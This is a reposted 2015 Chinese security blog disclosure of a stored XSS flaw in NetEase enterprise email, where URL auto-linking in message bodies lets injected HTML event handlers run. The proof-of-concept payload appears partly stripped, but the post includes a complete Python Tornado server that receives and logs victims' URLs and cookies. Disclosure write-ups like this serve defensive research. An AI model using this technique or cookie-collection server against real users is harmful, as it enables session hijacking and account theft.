记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

网易企业邮箱储存型xss可获取用户cookie

2015-05-07 15:50

储存型xss啦~

邮件正文直接xss啦~

网易企业邮箱显示邮件正文时候会自动把 http://xxx.xxx 转换成 http://xxx.xxx。但是转换不当导致同一行内的任意文本标签被转换为 html 元素。不多说,直接来:



POC:

邮件正文直接写


http://aoeu.com



注意后面的http://xxx.xxx是必须要有的,否则不会被尖括号不会被转义回来。onmouseover换成onerror也行,更直接。(但是我的ff似乎被玩坏了,不管哪里的onerror内容不执行了QAQ……chrome下可以)



简易服务器:


#!/usr/bin/env python3
import tornado
from tornado.ioloop import IOLoop
from tornado.web import Application
from threading import Lock

m = Lock()

class MainHandler(tornado.web.RequestHandler):
def post(self):
url = self.get_argument('a', default='')
cookie = self.get_argument('t', default='')
m.acquire()
print('url: {0}\n'.format(url))
print('cookie: {0}\n\n'.format(cookie))
with open('log', 'a') as f:
f.write('url: {0}\n'.format(url))
f.write('cookie: {0}\n\n'.format(cookie))
m.release()
self.write('')

def main():
app = Application([
(r'/', MainHandler),
])
app.listen(8000)
IOLoop.instance().start()

if __name__ == '__main__':
main()




 

2015-04-06-025710_980x425_scrot.png


 

2015-04-06-025733_1363x230_scrot.png

 

解决方案:

正确处理超链接。

 

知识来源: www.2cto.com/Article/201505/397289.html

阅读:115252 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“网易企业邮箱储存型xss可获取用户cookie”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云